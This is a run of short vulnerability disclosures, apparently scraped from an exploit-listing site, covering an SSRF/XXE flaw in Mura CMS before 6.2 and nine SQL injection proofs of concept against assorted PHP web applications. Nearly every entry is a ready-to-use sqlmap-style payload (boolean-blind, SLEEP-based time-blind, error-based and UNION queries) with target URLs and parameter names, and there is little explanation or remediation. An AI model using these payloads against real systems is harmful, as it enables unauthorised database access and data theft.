Any user can cause Mura CMS before version 6.2 to make a http request. As an added bonus, the response from that HTTP GET request is passed directly to XmlParse(). It is possible to read a file from the file system using an XXE attack.
SQL injection on [category] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/tutorial/ Parameter: category (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category=5 AND 1845=1845&keywords=xxxxx
SQL injection on [keywords] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/search.php?keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products Parameter: keywords (GET) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: keywords=product') UNION ALL SELECT NULL,CONCAT(0x716b787071,0x506961776c6f79515068694b454e736668707675627448527949566e434472706a72624a466a5468,0x7171627171)-- LEhA&rctyp=Products
SQL injection on [category] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/search_product.php?category=1 AND 8132=8132&name=xxxxx Parameter: category (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category=1 AND 8132=8132&name=xxxxx Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: category=1 AND SLEEP(5)&name=xxxxx
SQL injection on [sk] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/category.php?sk=2 AND 5895=5895 Parameter: sk (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sk=2 AND 5895=5895 Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: sk=-9224 UNION ALL SELECT NULL,NULL,CONCAT(0x717a627071,0x6a5954706679724662715071764b6f6b6b5448677770526873556c726b747079556b5341516d7559,0x716a627a71),NULL-- Pddp
SQL injection on [hid] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/hotel.php?hid=2 AND 6652=6652 Parameter: hid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: hid=2 AND 6652=6652 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: hid=2 AND SLEEP(5) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: hid=-1685 UNION ALL SELECT NULL,CONCAT(0x7162716271,0x696b6a4c52576c76446173666d5972704d454258706146434f544c78416a52754444694864786a42,0x7176786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Nqcw
SQL injection on [keywords] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/food/ Parameter: keywords (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: keywords=xxxxx' AND (SELECT 2438 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (ELT(2438=2438,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TkKa'='TkKa&order_option=1&category=1&price=1000 Type: UNION query Title: Generic UNION query (NULL) - 22 columns Payload: keywords=xxxxx' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786a71,0x497a704b724e4c4e665a556e6b626d45534a696d5a79554d726e506a686a6c5649627355675a6269,0x7162717871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hSOz&order_option=1&category=1&price=1000
SQL injection on [pd_maincat_id] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/advance-search-result.php?keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search Parameter: pd_maincat_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: keywords=any&pd_maincat_id=1' AND 7301=7301 AND 'iXUk'='iXUk&submit=Search Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: keywords=any&pd_maincat_id=1' AND SLEEP(5) AND 'aHHy'='aHHy&submit=Search
SQL injection on [category] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/book_search.php?book_name=xxxxx&category=4 AND SLEEP(5). Parameter: category (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: book_name=xxxxx&category=4 AND SLEEP(5)
SQL injection on [category_id] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/search.php?category_id=1 AND 2635=2635&sub_category_id=1&search=xxxxx Parameter: category_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: category_id=1 AND 2635=2635&sub_category_id=1&search=xxxxx Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: category_id=1 AND SLEEP(5)&sub_category_id=1&search=xxxxx Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: category_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71786a7071,0x714e746578554b6b4b4274697974755366576555457a6c6c576269474c7877744347466d6647695a,0x7176767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JpGm&sub_category_id=1&search=xxxxx
Services By CQR